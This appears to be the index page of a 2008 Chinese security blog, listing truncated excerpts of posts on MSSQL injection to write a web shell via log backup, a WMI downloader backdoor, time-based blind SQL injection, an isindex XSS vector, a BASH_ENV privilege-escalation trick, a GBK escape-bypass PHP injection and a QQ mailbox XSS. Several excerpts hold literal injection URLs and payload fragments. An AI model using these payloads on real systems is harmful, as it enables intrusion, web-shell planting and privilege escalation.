%5C
Human Knowledge Belongs To The World!
首页
新随笔
联系
订阅
管理
posts - 227, comments - 67, trackbacks - 0
2008年9月18日
MSSQL 2005 Backup log shell
摘要: 第一步http://www.sb.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--第二步:http://www.sb.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006...
阅读全文
posted @ 2008-09-18 15:29 %5C 阅读(404) 评论(2)
编辑
新型下载者
摘要: 利用WMI打造完美“三无”后门-Downloader and Uploader Welcome!各位ScriptKid,欢迎来到脚本世界。 终于到周末。可以多陪陪家人,玩玩游戏,研究研究自己感兴趣的东西了。 今天继续的是两个很简单的功能,下载指定文件到目标机器与获取目标机器任意文件。 直接来看示例代码。 Downloader Function DownLoadFil...
阅读全文
posted @ 2008-09-18 15:19 %5C 阅读(356) 评论(0)
编辑
2008年9月15日
基于时间差的SQL盲注技巧
摘要: 作者提出的技巧的主要思路是:在盲注(blind SQL injection)时,如果不同SQL injection 指令的结果,无法由 HTTP Response 本身得知,那么可以用时间差的方式判断。可以设计一个很耗时的 SQL 指令,这时如果 SQL injection 成功,那么这个SQL injection 指令的执行结果,会影响到 Web server 回复 HTTP response ...
阅读全文
posted @ 2008-09-15 11:04 %5C 阅读(556) 评论(0)
编辑
跨站腳本攻擊(XSS):過濾不完的惡夢,又有新攻擊語法!
摘要: 跨站腳本攻擊(Cross Site Scripting,簡稱 XSS,亦翻為跨網站的入侵字串)又有新的攻擊語法!此次觸發惡意腳本不需要用到 script 標籤(譬如 <script>alert(1)</script>),也不用 javascript 協定(譬如 javascript:alert(1)),而是 8 月 26 日所揭露的<isindex type=imag...
阅读全文
posted @ 2008-09-15 10:53 %5C 阅读(327) 评论(0)
编辑
提权用的一个技巧
摘要: 一个linux提权用的技巧,放出来全当找工作攒RP了。OK,通常情况下,我们在执行bash脚本的时候,有一个执行过程,其中有一点比较重要:如果BASH_ENV被设置的话,它就会执行BASH_ENV指向的脚本一个test:[xiaoyu@localdomain ~]$ echo $BASH_ENV[xiaoyu@localdomain ~]$ export BASH_ENV="/tmp/.bashr...
阅读全文
posted @ 2008-09-15 10:50 %5C 阅读(282) 评论(0)
编辑
2008年9月14日
Microsoft SQL Server sqlvdir.dll ActiveX控件缓冲区溢出漏洞
摘要: 受影响系统:Microsoft SQL Server 2000 SP4Microsoft SQL Server 2000 SP3aMicrosoft SQL Server 2000 SP3Microsoft SQL Server 2000 SP2Microsoft SQL Server 2000 SP1Microsoft SQL Server 2000描述:BUGTRAQID: 31129Micr...
阅读全文
posted @ 2008-09-14 17:06 %5C 阅读(201) 评论(0)
编辑
2008年9月12日
关于php漏洞
摘要: 对于字符型注入是php比较麻烦的问题。因为safe_mode为On的时候会过滤'为\'众所周知,\的编码是%5c如果前面加个%d5的话,就和%5c构成一个汉字:诚这样就可以很好的进入查询系统:%d5%5c注入形式为:target.php?name=aa测试:target.php?name=aa%d5'
阅读全文
posted @ 2008-09-12 11:06 %5C 阅读(444) 评论(1)
编辑
QQ邮箱跨站漏洞0day
摘要: 09月10日QQ邮箱跨站漏洞QQ邮箱跨站漏洞就是针对文件中转站首先,打开我的QQ邮箱,用我自己的做测试...=700) window.open('http://www.hxhack.com/bbs/attachment/74_2_2db56ddfca265c3.jpg');" src="http://www.hxhack.com/bbs/attachment/74_2_2db56ddfca265c...
阅读全文
posted @ 2008-09-12 10:14 %5C 阅读(584) 评论(2)
编辑
2008年9月11日
渗透测试(Penetration Testing)
摘要: 渗透测试(Penetration Testing)目录Author : ZwelLLast Updated : 2007.12.16零、前言一、简介二、制定实施方案三、具体操作过程四、生成报告五、测试过程中的风险及规避参考资料FAQ集零、前言渗透测试在未得到被测试方授权之前依据某些地区法律规定是违法行为。 这里我们提供的所有渗透测试方法均为(假设为)合法的评估服务,也就是通常所说的道德黑客行为(E...
阅读全文
posted @ 2008-09-11 09:30 %5C 阅读(365) 评论(0)
编辑
2008年9月5日
跨库也能差异备份
摘要: 其实很简单,大部分人备份的时候都用那条语句,语句里db_name(),其实可以改成任意数据库这就使得,可以饶过有脏数据的数据库!其实还有好多小技巧,比如如果权限足够的话,可以备份到同一段的其他机器,比如域内的,或者密码一样的机器!
阅读全文
posted @ 2008-09-05 17:16 %5C 阅读(282) 评论(1)
编辑
仅列出标题
下一页
<
2012年2月
>
日
一
二
三
四
五
六
29
30
31
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
1
2
3
4
5
6
7
8
9
10
干将莫邪也为凡铁铸成,只是善加锻造、融入心神,而成上古神兵。宝剑从来都是双刃,正邪之道,存乎一心....
昵称:
%5C
园龄:
4年10个月
粉丝:
1
关注:
0
搜索
随笔档案
(227)
2008年9月 (10)
2008年8月 (6)
2008年7月 (2)
2008年6月 (6)
2008年5月 (2)
2008年4月 (9)
2008年1月 (1)
2007年12月 (2)
2007年11月 (5)
2007年9月 (23)
2007年8月 (50)
2007年7月 (50)
2007年6月 (48)
2007年5月 (8)
2007年4月 (3)
2007年3月 (2)
文章档案
(5)
2007年7月 (3)
2007年3月 (2)
常用站点
安全文摘
鬼仔's blog
寒水芊芊's Blog
蕾蕾's Blog
小马's bLOG
中国被黑站点统计
紫色贵族's Blog
做最新的漏洞统计
积分与排名
积分 - 66530
排名 - 1596
最新评论
阅读排行榜
评论排行榜
推荐排行榜